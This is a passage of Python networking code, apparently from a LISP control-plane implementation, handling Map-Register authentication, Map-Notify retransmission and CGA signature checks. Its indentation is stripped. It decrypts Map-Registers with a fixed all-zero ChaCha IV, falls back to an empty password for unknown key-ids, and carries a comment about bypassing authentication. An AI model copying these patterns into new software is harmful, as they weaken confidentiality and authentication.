key = map_notify.nonce_key
if (key in lisp_map_notify_queue):
map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
try:
lisp_map_notify_queue.pop(key)
except:
lprint("Key not found in Map-Notify queue")
#endtry
#endif
return
#endif
lisp_sockets = map_notify.lisp_sockets
map_notify.retry_count += 1
lprint("Retransmit {} with nonce 0x{} to xTR {}, retry {}".format( \
bold("Map-Notify", False), map_notify.nonce_key,
red(dest.print_address(), False), map_notify.retry_count))
lisp_send_map_notify(lisp_sockets, map_notify.packet, dest, port)
if (map_notify.site): map_notify.site.map_notifies_sent += 1
#
# Restart retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_merged_map_notify
#
# Send Map-Notify with a merged RLOC-set to each ETR in the RLOC-set.
#
def lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record):
#
# Build EID-record once.
#
eid_record.rloc_count = len(parent.registered_rlocs)
packet_record = eid_record.encode()
eid_record.print_record("Merged Map-Notify ", False)
#
# Buld RLOC-records for merged RLOC-set.
#
for xtr in parent.registered_rlocs:
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(xtr)
rloc_record.local_bit = True
rloc_record.probe_bit = False
rloc_record.reach_bit = True
packet_record += rloc_record.encode()
rloc_record.print_record(" ")
del(rloc_record)
#endfor
#
# Build Map-Notify for each xTR that needs to receive the Map-Notify.
#
for xtr in parent.registered_rlocs:
dest = xtr.rloc
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
key_id = map_register.key_id
map_notify.key_id = key_id
map_notify.alg_id = map_register.alg_id
map_notify.auth_len = map_register.auth_len
map_notify.nonce = map_register.nonce
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(dest)
map_notify.etr_port = map_register.sport
map_notify.site = parent.site
packet = map_notify.encode(packet_record, parent.site.auth_key[key_id])
map_notify.print_notify()
#
# Put Map-Notify state on retransmission queue.
#
key = map_notify.nonce_key
if (key in lisp_map_notify_queue):
remove = lisp_map_notify_queue[key]
remove.retransmit_timer.cancel()
del(remove)
#endif
lisp_map_notify_queue[key] = map_notify
#
# Send out.
#
lprint("Send merged Map-Notify to ETR {}".format( \
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
parent.site.map_notifies_sent += 1
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
#endfor
return
#enddef
#
# lisp_build_map_notify
#
# Setup retransmission queue entry to send the first Map-Notify.
#
def lisp_build_map_notify(lisp_sockets, eid_records, eid_list, record_count,
source, port, nonce, key_id, alg_id, auth_len, site, map_register_ack):
key = lisp_hex_string(nonce) + source.print_address()
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(eid_list)
if (key in lisp_map_notify_queue):
map_notify = lisp_map_notify_queue[key]
s = red(source.print_address_no_iid(), False)
lprint("Map-Notify with nonce 0x{} pending for xTR {}".format( \
lisp_hex_string(map_notify.nonce), s))
return
#endif
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = record_count
key_id = key_id
map_notify.key_id = key_id
map_notify.alg_id = alg_id
map_notify.auth_len = auth_len
map_notify.nonce = nonce
map_notify.nonce_key = lisp_hex_string(nonce)
map_notify.etr.copy_address(source)
map_notify.etr_port = port
map_notify.site = site
map_notify.eid_list = eid_list
#
# Put Map-Notify state on retransmission queue.
#
if (map_register_ack == False):
key = map_notify.nonce_key
lisp_map_notify_queue[key] = map_notify
#endif
if (map_register_ack):
lprint("Send Map-Notify to ack Map-Register")
else:
lprint("Send Map-Notify for RLOC-set change")
#endif
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, site.auth_key[key_id])
map_notify.print_notify()
if (map_register_ack == False):
eid_record = lisp_eid_record()
eid_record.decode(eid_records)
eid_record.print_record(" ", False)
#endif
#
# Send out.
#
lisp_send_map_notify(lisp_sockets, packet, map_notify.etr, port)
site.map_notifies_sent += 1
if (map_register_ack): return
#
# Set retransmit timer if this is an unsolcited Map-Notify. Otherwise,
# we are acknowledging a Map-Register and the registerer is not going
# to send a Map-Notify-Ack so we shouldn't expect one.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_map_notify_ack
#
# Change Map-Notify message to have a new type (Map-Notify-Ack) and
# reauthenticate message.
#
def lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms):
map_notify.map_notify_ack = True
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, ms.password)
map_notify.print_notify()
#
# Send the Map-Notify-Ack.
#
dest = ms.map_server
lprint("Send Map-Notify-Ack to {}".format(
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_multicast_map_notify
#
# Send a Map-Notify message to an xTR for the supplied (S,G) passed into this
# function.
#
def lisp_send_multicast_map_notify(lisp_sockets, site_eid, eid_list, xtr):
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
map_notify.nonce = lisp_get_control_nonce()
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(xtr)
map_notify.etr_port = LISP_CTRL_PORT
map_notify.eid_list = eid_list
key = map_notify.nonce_key
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(map_notify.eid_list)
if (key in lisp_map_notify_queue):
map_notify = lisp_map_notify_queue[key]
lprint("Map-Notify with nonce 0x{} pending for ITR {}".format( \
map_notify.nonce, red(xtr.print_address_no_iid(), False)))
return
#endif
#
# Put Map-Notify state on retransmission queue.
#
lisp_map_notify_queue[key] = map_notify
#
# Determine if there are any RTRs in the RLOC-set for this (S,G).
#
rtrs_exist = site_eid.rtrs_in_rloc_set()
if (rtrs_exist):
if (site_eid.is_rtr_in_rloc_set(xtr)): rtrs_exist = False
#endif
#
# Build EID-record.
#
eid_record = lisp_eid_record()
eid_record.record_ttl = 1440
eid_record.eid.copy_address(site_eid.eid)
eid_record.group.copy_address(site_eid.group)
eid_record.rloc_count = 0
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
eid_record.rloc_count += 1
#endfor
packet = eid_record.encode()
#
# Print contents of Map-Notify.
#
map_notify.print_notify()
eid_record.print_record(" ", False)
#
# Build locator-set with only RTR RLOCs if they exist.
#
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(rloc_entry)
rloc_record.local_bit = True
rloc_record.probe_bit = False
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#
# Encode it.
#
packet = map_notify.encode(packet, "")
if (packet == None): return
#
# Send Map-Notify to xTR.
#
lisp_send_map_notify(lisp_sockets, packet, xtr, LISP_CTRL_PORT)
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_queue_multicast_map_notify
#
# This funciton will look for the ITRs in the local site cache.
#
def lisp_queue_multicast_map_notify(lisp_sockets, rle_list):
null_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
for sg in rle_list:
sg_site_eid = lisp_site_eid_lookup(sg[0], sg[1], True)
if (sg_site_eid == None): continue
#
# (S,G) RLOC-set could be empty when last RLE goes away. We will have
# to search all individual registrations searching for RTRs.
#
# We store in a dictonary array so we can remove duplicates.
#
sg_rloc_set = sg_site_eid.registered_rlocs
if (len(sg_rloc_set) == 0):
temp_set = {}
for se in list(sg_site_eid.individual_registrations.values()):
for rloc_entry in se.registered_rlocs:
if (rloc_entry.is_rtr() == False): continue
temp_set[rloc_entry.rloc.print_address()] = rloc_entry
#endfor
#endfor
sg_rloc_set = list(temp_set.values())
#endif
#
# If this is a (0.0.0.0/0, G) or a (0::/0, G), we send a Map-Notify
# to all members (all RLOCs in the sg_rloc_set.
#
notify = []
found_rtrs = False
if (sg_site_eid.eid.address == 0 and sg_site_eid.eid.mask_len == 0):
notify_str = []
rle_nodes = []
if (len(sg_rloc_set) != 0 and sg_rloc_set[0].rle != None):
rle_nodes = sg_rloc_set[0].rle.rle_nodes
#endif
for rle_node in rle_nodes:
notify.append(rle_node.address)
notify_str.append(rle_node.address.print_address_no_iid())
#endfor
lprint("Notify existing RLE-nodes {}".format(notify_str))
else:
#
# If the (S,G) has an RTR registered, then we will send a
# Map-Notify to the RTR instead the ITRs of the source-site.
#
for rloc_entry in sg_rloc_set:
if (rloc_entry.is_rtr()): notify.append(rloc_entry.rloc)
#endfor
#
# If no RTRs were found, get ITRs from source-site.
#
found_rtrs = (len(notify) != 0)
if (found_rtrs == False):
site_eid = lisp_site_eid_lookup(sg[0], null_group, False)
if (site_eid == None): continue
for rloc_entry in site_eid.registered_rlocs:
if (rloc_entry.rloc.is_null()): continue
notify.append(rloc_entry.rloc)
#endfor
#endif
#
# No ITRs or RTRs fond.
#
if (len(notify) == 0):
lprint("No ITRs or RTRs found for {}, Map-Notify suppressed". \
format(green(sg_site_eid.print_eid_tuple(), False)))
continue
#endif
#endif
#
# Send multicast Map-Notify to either ITR-list or RTR-list.
#
for xtr in notify:
lprint("Build Map-Notify to {}TR {} for {}".format("R" if \
found_rtrs else "x", red(xtr.print_address_no_iid(), False),
green(sg_site_eid.print_eid_tuple(), False)))
el = [sg_site_eid.print_eid_tuple()]
lisp_send_multicast_map_notify(lisp_sockets, sg_site_eid, el, xtr)
time.sleep(.001)
#endfor
#endfor
return
#enddef
#
# lisp_find_sig_in_rloc_set
#
# Look for a "signature" key in a JSON RLOC-record. Return None, if not found.
# Return RLOC record if found.
#
def lisp_find_sig_in_rloc_set(packet, rloc_count):
for i in range(rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
json_sig = rloc_record.json
if (json_sig == None): continue
try:
json_sig = json.loads(json_sig.json_string)
except:
lprint("Found corrupted JSON signature")
continue
#endtry
if ("signature" not in json_sig): continue
return(rloc_record)
#endfor
return(None)
#enddef
#
# lisp_get_eid_hash
#
# From an EID, return EID hash value. Here is an example where all but the
# high-order byte is the EID hash for each hash-length:
#
# EID: fd4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430
# EID-hash: 4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430 eid_hash_len = 120
# EID-hash: 6dbd:3799:48e1:c6a2:9430 eid_hash_len = 80
#
# Note when an eid-prefix in lisp_eid_hashes[] has an instance-id of -1, it
# means the eid-prefix is used for all EIDs from any instance-id.
#
# Returns a string with hex digits between colons and the hash length in bits.
# Returns None if the IPv6 EID is not a crypto-hash address. These addresses
# are not authenticated.
#
def lisp_get_eid_hash(eid):
hash_mask_len = None
for eid_prefix in lisp_eid_hashes:
#
# For wildcarding the instance-ID.
#
iid = eid_prefix.instance_id
if (iid == -1): eid_prefix.instance_id = eid.instance_id
ms = eid.is_more_specific(eid_prefix)
eid_prefix.instance_id = iid
if (ms):
hash_mask_len = 128 - eid_prefix.mask_len
break
#endif
#endfor
if (hash_mask_len == None): return(None)
address = eid.address
eid_hash = ""
for i in range(0, old_div(hash_mask_len, 16)):
addr = address & 0xffff
addr = hex(addr)[2::]
eid_hash = addr.zfill(4) + ":" + eid_hash
address >>= 16
#endfor
if (hash_mask_len % 16 != 0):
addr = address & 0xff
addr = hex(addr)[2::]
eid_hash = addr.zfill(2) + ":" + eid_hash
#endif
return(eid_hash[0:-1])
#enddef
#
# lisp_lookup_public_key
#
# Given an EID, do a mapping system lookup for a distinguished-name EID
# 'hash-<cga-hash>' to obtain the public-key from an RLOC-record.
#
# Return [hash_id, pubkey, True/False]. Values can be of value None but last
# boolean argument is if the hash lookup was found.
#
def lisp_lookup_public_key(eid):
iid = eid.instance_id
#
# Parse out CGA hash to do public-key lookup with instance-ID and hash
# as a distinguished-name EID.
#
pubkey_hash = lisp_get_eid_hash(eid)
if (pubkey_hash == None): return([None, None, False])
pubkey_hash = "hash-" + pubkey_hash
hash_eid = lisp_address(LISP_AFI_NAME, pubkey_hash, len(pubkey_hash), iid)
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
#
# Do lookup in local instance-ID.
#
site_eid = lisp_site_eid_lookup(hash_eid, group, True)
if (site_eid == None): return([hash_eid, None, False])
#
# Look for JSON RLOC with key "public-key".
#
pubkey = None
for rloc in site_eid.registered_rlocs:
json_pubkey = rloc.json
if (json_pubkey == None): continue
try:
json_pubkey = json.loads(json_pubkey.json_string)
except:
lprint("Registered RLOC JSON format is invalid for {}".format( \
pubkey_hash))
return([hash_eid, None, False])
#endtry
if ("public-key" not in json_pubkey): continue
pubkey = json_pubkey["public-key"]
break
#endfor
return([hash_eid, pubkey, True])
#enddef
#
# lisp_verify_cga_sig
#
# Verify signature of an IPv6 CGA-based EID if the public-key hash exists
# in the local mapping database (with same instance-ID).
#
def lisp_verify_cga_sig(eid, rloc_record):
#
# Use signature-eid if in JSON string. Otherwise, Crypto-EID is signature-
# EID.
#
sig = json.loads(rloc_record.json.json_string)
if (lisp_get_eid_hash(eid)):
sig_eid = eid
elif ("signature-eid" in sig):
sig_eid_str = sig["signature-eid"]
sig_eid = lisp_address(LISP_AFI_IPV6, sig_eid_str, 0, 0)
else:
lprint(" No signature-eid found in RLOC-record")
return(False)
#endif
#
# Lookup CGA hash in mapping datbase to get public-key.
#
hash_eid, pubkey, lookup_good = lisp_lookup_public_key(sig_eid)
if (hash_eid == None):
eid_str = green(sig_eid.print_address(), False)
lprint(" Could not parse hash in EID {}".format(eid_str))
return(False)
#endif
found = "found" if lookup_good else bold("not found", False)
eid_str = green(hash_eid.print_address(), False)
lprint(" Lookup for crypto-hashed EID {} {}".format(eid_str, found))
if (lookup_good == False): return(False)
if (pubkey == None):
lprint(" RLOC-record with public-key not found")
return(False)
#endif
pubkey_str = pubkey[0:8] + "..." + pubkey[-8::]
lprint(" RLOC-record with public-key '{}' found".format(pubkey_str))
#
# Get signature from RLOC-record in a form to let key.verify() do its
# thing.
#
sig_str = sig["signature"]
try:
sig = binascii.a2b_base64(sig_str)
except:
lprint(" Incorrect padding in signature string")
return(False)
#endtry
sig_len = len(sig)
if (sig_len & 1):
lprint(" Signature length is odd, length {}".format(sig_len))
return(False)
#endif
#
# The signature is over the following string: "[<iid>]<eid>".
#
sig_data = sig_eid.print_address()
#
# Verify signature of CGA and public-key.
#
pubkey = binascii.a2b_base64(pubkey)
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
bad = bold("Bad public-key", False)
lprint(" {}, not in PEM format".format(bad))
return(False)
#endtry
#
# The hashfunc must be supplied to get signature interoperability between
# a Go signer an a Python verifier. The signature data must go through
# a sha256 hash first. Python signer must use:
#
# ecdsa.SigningKey.sign(sig_data, hashfunc=hashlib.sha256)
#
# Note to use sha256 you need a curve of NIST256p.
#
try:
good = key.verify(sig, sig_data.encode(), hashfunc=hashlib.sha256)
except:
lprint(" Signature library failed for signature data '{}'".format( \
sig_data))
lprint(" Signature used '{}'".format(sig_str))
return(False)
#endtry
return(good)
#enddef
#
# lisp_remove_eid_from_map_notify_queue
#
# Check to see if any EIDs from the input list are in the Map-Notify
# retransmission queue. If so, remove them. That is, pop the key from the
# dictionary array. The key is the catentation of the xTR address and
# map-notify nonce.
#
def lisp_remove_eid_from_map_notify_queue(eid_list):
#
# Determine from the supplied EID-list, if any EID is in any EID-list of
# a queued Map-Notify.
#
keys_to_remove = []
for eid_tuple in eid_list:
for mn_key in lisp_map_notify_queue:
map_notify = lisp_map_notify_queue[mn_key]
if (eid_tuple not in map_notify.eid_list): continue
keys_to_remove.append(mn_key)
timer = map_notify.retransmit_timer
if (timer): timer.cancel()
lprint("Remove from Map-Notify queue nonce 0x{} for EID {}".\
format(map_notify.nonce_key, green(eid_tuple, False)))
#endfor
#endfor
#
# Now remove keys that were determined to be removed.
#
for mn_key in keys_to_remove: lisp_map_notify_queue.pop(mn_key)
return
#enddef
#
# lisp_decrypt_map_register
#
# Check if we should just return a non encrypted packet, or decrypt and return
# a plaintext Map-Register message.
#
def lisp_decrypt_map_register(packet):
#
# Parse first 4 bytes which is not encrypted. If packet is not encrypted,
# return to caller. If it is encrypted, get 3-bit key-id next to e-bit.
#
header = socket.ntohl(struct.unpack("I", packet[0:4])[0])
e_bit = (header >> 13) & 0x1
if (e_bit == 0): return(packet)
ekey_id = (header >> 14) & 0x7
#
# Use 16-byte key which is 32 string characters.
#
try:
ekey = lisp_ms_encryption_keys[ekey_id]
ekey = ekey.zfill(32)
iv = "0" * 8
except:
lprint("Cannot decrypt Map-Register with key-id {}".format(ekey_id))
return(None)
#endtry
d = bold("Decrypt", False)
lprint("{} Map-Register with key-id {}".format(d, ekey_id))
#
# Use 20 rounds so we can interoperate with ct-lisp mobile platforms.
#
plaintext = chacha.ChaCha(ekey, iv, 20).decrypt(packet[4::])
return(packet[0:4] + plaintext)
#enddef
#
# lisp_process_map_register
#
# Process received Map-Register message.
#
def lisp_process_map_register(lisp_sockets, packet, source, sport):
global lisp_registered_count
#
# First check if we are expecting an encrypted Map-Register. This call
# will either return a unencrypted packet, a decrypted packet, or None
# if the key-id from the Map-Register is not registered.
#
packet = lisp_decrypt_map_register(packet)
if (packet == None): return
map_register = lisp_map_register()
orig_packet, packet = map_register.decode(packet)
if (packet == None):
lprint("Could not decode Map-Register packet")
return
#endif
map_register.sport = sport
map_register.print_map_register()
#
# Verify that authentication parameters are consistent.
#
sha1_or_sha2 = True
if (map_register.auth_len == LISP_SHA1_160_AUTH_DATA_LEN):
sha1_or_sha2 = True
#endif
if (map_register.alg_id == LISP_SHA_256_128_ALG_ID):
sha1_or_sha2 = False
#endif
#
# For tracking which (S,G) RLEs have changed.
#
rle_list = []
#
# Process each EID record in Map-Register message.
#
site = None
start_eid_records = packet
eid_list = []
record_count = map_register.record_count
for i in range(record_count):
eid_record = lisp_eid_record()
rloc_record = lisp_rloc_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Register packet")
return
#endif
eid_record.print_record(" ", False)
#
# Lookup lisp_site entry.
#
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
False)
match_str = site_eid.print_eid_tuple() if site_eid else None
#
# Allowing overlapping ams registered prefixes. Make sure we get the
# configured parent entry and not the registered more-specific. This
# registration could be a more-specific of the registered more-specific
# entry.
#
if (site_eid and site_eid.accept_more_specifics == False):
if (site_eid.eid_record_matches(eid_record) == False):
parent = site_eid.parent_for_more_specifics
if (parent): site_eid = parent
#endif
#endif
#
# Check if this is a new more-specific EID-prefix registration that
# will match a static configured site-eid with "accept-more-specifics"
# configured.
#
ams = (site_eid and site_eid.accept_more_specifics)
if (ams):
ms_site_eid = lisp_site_eid(site_eid.site)
ms_site_eid.dynamic = True
ms_site_eid.eid.copy_address(eid_record.eid)
ms_site_eid.group.copy_address(eid_record.group)
ms_site_eid.parent_for_more_specifics = site_eid
ms_site_eid.add_cache()
ms_site_eid.inherit_from_ams_parent()
site_eid.more_specific_registrations.append(ms_site_eid)
site_eid = ms_site_eid
else:
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
True)
#endif
eid_str = eid_record.print_eid_tuple()
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(" {} for EID {}{}".format(notfound, green(eid_str, False),
", matched non-ams {}".format(green(match_str, False) if \
match_str else "")))
#
# Need to hop over RLOC-set so we can get to the next EID-record.
#
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
site = site_eid.site
if (ams):
e = site_eid.parent_for_more_specifics.print_eid_tuple()
lprint(" Found ams {} for site '{}' for registering prefix {}". \
format(green(e, False), site.site_name, green(eid_str, False)))
else:
e = green(site_eid.print_eid_tuple(), False)
lprint(" Found {} for site '{}' for registering prefix {}". \
format(e, site.site_name, green(eid_str, False)))
#endif
#
# Check if site configured in admin-shutdown mode.
#
if (site.shutdown):
lprint((" Rejecting registration for site '{}', configured in " +
"admin-shutdown state").format(site.site_name))
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
continue
#endif
#
# Verify authentication before processing locator-set. Quick hack
# while I figure out why sha1 and sha2 authentication is not working
# from cisco. An NX-OS Map-Register will have a 0 nonce. We are going
# to use this to bypass the authentication check.
#
key_id = map_register.key_id
if (key_id in site.auth_key):
password = site.auth_key[key_id]
else:
password = ""
#endif
auth_good = lisp_verify_auth(orig_packet, map_register.alg_id,
map_register.auth_data, password)
dynamic = "dynamic " if site_eid.dynamic else ""
passfail = bold("passed" if auth_good else "failed", False)
key_id = "key-id {}".format(key_id) if key_id == map_register.key_id \
else "bad key-id {}".format(map_register.key_id)
lprint(" Authentication {} for {}EID-prefix {}, {}".format( \
passfail, dynamic, green(eid_str, False), key_id))
#
# If the IPv6 EID is a CGA, verify signature if it exists in an
# RLOC-record.
#
cga_good = True
is_crypto_eid = (lisp_get_eid_hash(eid_record.eid) != None)
if (is_crypto_eid or site_eid.require_signature):
required = "Required " if site_eid.require_signature else ""
eid_str = green(eid_str, False)
rloc = lisp_find_sig_in_rloc_set(packet, eid_record.rloc_count)
if (rloc == None):
cga_good = False
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}, no signature found").format(required,
bold("failed", False), eid_str))
else:
cga_good = lisp_verify_cga_sig(eid_record.eid, rloc)
passfail = bold("passed" if cga_good else "failed", False)
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}").format(required, passfail, eid_str))
#endif
#endif
if (auth_good == False or cga_good == False):
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
#
# If merge being requested get individual site-eid. If not, and what
# was cached had merge bit set, set flag to issue error.
#
if (map_register.merge_register_requested):
parent = site_eid
parent.inconsistent_registration = False
#
# Clear out all registrations, there is a new site-id registering.
# Or there can be multiple sites registering for a multicast (S,G).
#
if (site_eid.group.is_null()):
if (parent.site_id != map_register.site_id):
parent.site_id = map_register.site_id
parent.registered = False
parent.individual_registrations = {}
parent.registered_rlocs = []
lisp_registered_count -= 1
#endif
#endif
key = map_register.xtr_id
if (key in site_eid.individual_registrations):
site_eid = site_eid.individual_registrations[key]
else:
site_eid = lisp_site_eid(site)
site_eid.eid.copy_address(parent.eid)
site_eid.group.copy_address(parent.group)
site_eid.encrypt_json = parent.encrypt_json
parent.individual_registrations[key] = site_eid
#endif
else:
site_eid.inconsistent_registration = \
site_eid.merge_register_requested
#endif
site_eid.map_registers_received += 1
#
# If TTL is 0, unregister entry if source of Map-Reqister is in the
# list of currently registered RLOCs.
#
bad = (site_eid.is_rloc_in_rloc_set(source) == False)
if (eid_record.record_ttl == 0 and bad):
lprint(" Ignore deregistration request from {}".format( \
red(source.print_address_no_iid(), False)))
continue
#endif
#
# Clear out previously stored RLOCs. Put new ones in if validated
# against configured ones.
#
previous_rlocs = site_eid.registered_rlocs
site_eid.registered_rlocs = []
#
# Process each RLOC record in EID record.
#
start_rloc_records = packet
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None, site_eid.encrypt_json)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
rloc_record.print_record(" ")
#
# Run RLOC in Map-Register against configured RLOC policies.
#
if (len(site.allowed_rlocs) > 0):
addr_str = rloc_record.rloc.print_address()
if (addr_str not in site.allowed_rlocs):
lprint((" Reject registration, RLOC {} not " + \
"configured in allowed RLOC-set").format( \
red(addr_str, False)))
site_eid.registered = False
packet = rloc_record.end_of_rlocs(packet,
eid_record.rloc_count - j - 1)
break
#endif
#endif
#
# RLOC validated good. Otherwise, go to next EID record
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, source)
#
# If the source of the Map-Register is in the locator-set, then
# store if it wants Map-Notify messages when a new locator-set
# is registered later.
#
if (source.is_exact_match(rloc.rloc)):
rloc.map_notify_requested = map_register.map_notify_requested
#endif
#
# Add to RLOC set for site-eid.
#
site_eid.registered_rlocs.append(rloc)
#endfor
changed_rloc_set = \
(site_eid.do_rloc_sets_match(previous_rlocs) == False)
#
# Do not replace RLOCs if the Map-Register is a refresh and the
# locator-set is different.
#
if (map_register.map_register_refresh and changed_rloc_set and
site_eid.registered):
lprint(" Reject registration, refreshes cannot change RLOC-set")
site_eid.registered_rlocs = previous_rlocs
continue
#endif
#
# Copy fields from packet into internal data structure. First set
# site EID specific state.
#
if (site_eid.registered == False):
site_eid.first_registered = lisp_get_timestamp()
lisp_registered_count += 1
#endif
site_eid.last_registered = lisp_get_timestamp()
site_eid.registered = (eid_record.record_ttl != 0)
site_eid.last_registerer = source
#
# Now set site specific state.
#
site_eid.auth_sha1_or_sha2 = sha1_or_sha2
site_eid.proxy_reply_requested = map_register.proxy_reply_requested
site_eid.lisp_sec_present = map_register.lisp_sec_present
site_eid.map_notify_requested = map_register.map_notify_requested
site_eid.mobile_node_requested = map_register.mobile_node
site_eid.merge_register_requested = \
map_register.merge_register_requested
site_eid.use_register_ttl_requested = map_register.use_ttl_for_timeout
if (site_eid.use_register_ttl_requested):
site_eid.register_ttl = eid_record.store_ttl()
else:
site_eid.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
#endif
site_eid.xtr_id_present = map_register.xtr_id_present
if (site_eid.xtr_id_present):
site_eid.xtr_id = map_register.xtr_id
site_eid.site_id = map_register.site_id
#endif
#
# If merge requested, do it now for this EID-prefix.
#
if (map_register.merge_register_requested):
if (parent.merge_in_site_eid(site_eid)):
rle_list.append([eid_record.eid, eid_record.group])
#endif
if (map_register.map_notify_requested):
lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record)
#endif
#endif
if (changed_rloc_set == False): continue
if (len(rle_list) != 0): continue
eid_list.append(site_eid.print_eid_tuple())
#
# Send Map-Notify if the RLOC-set changed for thie site-eid. Send it
# to the previously registered RLOCs only if they requested it. Do
# not consider RLOC-sets with RLEs in them because at the end of
# the EID-record loop, we'll send a multicast Map-Notify.
#
peid_record = copy.deepcopy(eid_record)
eid_record = eid_record.encode()
eid_record += start_rloc_records
el = [site_eid.print_eid_tuple()]
lprint(" Changed RLOC-set, Map-Notifying old RLOC-set")
for rloc in previous_rlocs:
if (rloc.map_notify_requested == False): continue
if (rloc.rloc.is_exact_match(source)): continue
lisp_build_map_notify(lisp_sockets, eid_record, el, 1, rloc.rloc,
LISP_CTRL_PORT, map_register.nonce, map_register.key_id,
map_register.alg_id, map_register.auth_len, site, False)
#endfor
#
# Check subscribers.
#
lisp_notify_subscribers(lisp_sockets, peid_record, start_rloc_records,
site_eid.eid, site)
#endfor
#
# Send Map-Noitfy to ITRs if any (S,G) RLE has changed.
#
if (len(rle_list) != 0):
lisp_queue_multicast_map_notify(lisp_sockets, rle_list)
#endif
#
# The merged Map-Notify will serve as a Map-Register ack. So don't need
# to send another one below.
#
if (map_register.merge_register_requested): return
#
# Should we ack the Map-Register? Only if the Want-Map-Notify bit was set
# by the registerer.
#
if (map_register.map_notify_requested and site != None):
lisp_build_map_notify(lisp_sockets, start_eid_records, eid_list,
map_register.record_count, source, sport, map_register.nonce,
map_register.key_id, map_register.alg_id, map_register.auth_len,
site, True)
#endif
return
#enddef
#
# lisp_process_unicast_map_notify
#
# Have ITR process a Map-Notify as a result of sending a subscribe-request.
# Update map-cache entry with new RLOC-set.
#
def lisp_process_unicast_map_notify(lisp_sockets, packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
if (map_notify.record_count == 0): return
eid_records = map_notify.eid_records
for i in range(map_notify.record_count):
eid_record = lisp_eid_record()
eid_records = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
eid_str = eid_record.print_eid_tuple()
#
# If no map-cache entry exists or does not have action LISP_SEND_
# PUBSUB_ACTION, ignore.
#
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.eid)
if (mc == None):
e = green(eid_str, False)
lprint("Ignoring Map-Notify EID {}, no subscribe-request entry". \
format(e))
continue
#endif
#
# Check if map-cache entry is configured subscribe-request entry.
# Otherwise, it is an entry created from the subscribe-request entry
# from a returned Map-Notify.
#
if (mc.action != LISP_SEND_PUBSUB_ACTION):
if (mc.subscribed_eid == None):
e = green(eid_str, False)
lprint("Ignoring Map-Notify for non-subscribed EID {}". \
format(e))
continue
#endif
#endif
#
# Check if this is the map-cache entry for the EID or the SEND_PUBSUB
# configured map-cache entry. Reuse the memory if the EID entry exists
# and empty RLOC-set since we will rebuild it.
#
old_rloc_set = []
if (mc.action == LISP_SEND_PUBSUB_ACTION):
mc = lisp_mapping(eid_record.eid, eid_record.group, [])
mc.add_cache()
subscribed_eid = copy.deepcopy(eid_record.eid)
subscribed_group = copy.deepcopy(eid_record.group)
else:
subscribed_eid = mc.subscribed_eid
subscribed_group = mc.subscribed_group
